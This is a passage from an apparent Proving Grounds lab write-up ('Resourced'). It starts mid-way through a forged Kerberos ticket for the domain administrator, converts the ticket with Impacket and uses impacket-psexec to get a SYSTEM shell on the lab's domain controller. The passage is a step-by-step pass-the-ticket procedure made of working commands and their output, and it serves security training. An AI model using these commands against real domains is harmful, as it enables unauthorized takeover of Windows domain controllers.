      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
      b3VyY2VkLmxvY2Fs
[X] Error 1312 running LsaLookupAuthenticationPackage (ProtocalStatus): A specified logon session does not exist. It may already have been terminated

We will first remove all the whitespaces for the last ticket's content and store into a file.

Remove All Whitespace - Delete Spaces, Tabs, Newlines - Online - Browserling Web Developer Toolswww.browserling.com

We will then convert ticket content into a .ccache file in order to login as administrator.

$ echo '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' > ticket.kirbi.b64
                                                                                                       
┌──(ranay㉿kali)-[~/Desktop/PG/resourced]
└─$ base64 -d ticket.kirbi.b64 > ticket.kirbi     
                                                                                                       
┌──(ranay㉿kali)-[~/Desktop/PG/resourced]
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
                                                                                                       
┌──(ranay㉿kali)-[~/Desktop/PG/resourced]
└─$ echo "192.168.221.175 ResourceDC.resourced.local" | sudo tee -a /etc/hosts
[sudo] password for ranay: 
192.168.221.175 ResourceDC.resourced.local
                                                                                                       
┌──(ranay㉿kali)-[~/Desktop/PG/resourced]
└─$ KRB5CCNAME=ticket.ccache impacket-psexec resourced.local/administrator@ResourceDC.resourced.local -k -no-pass
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file FjIisOWc.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service yawA on ResourceDC.resourced.local.....
[*] Starting service yawA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system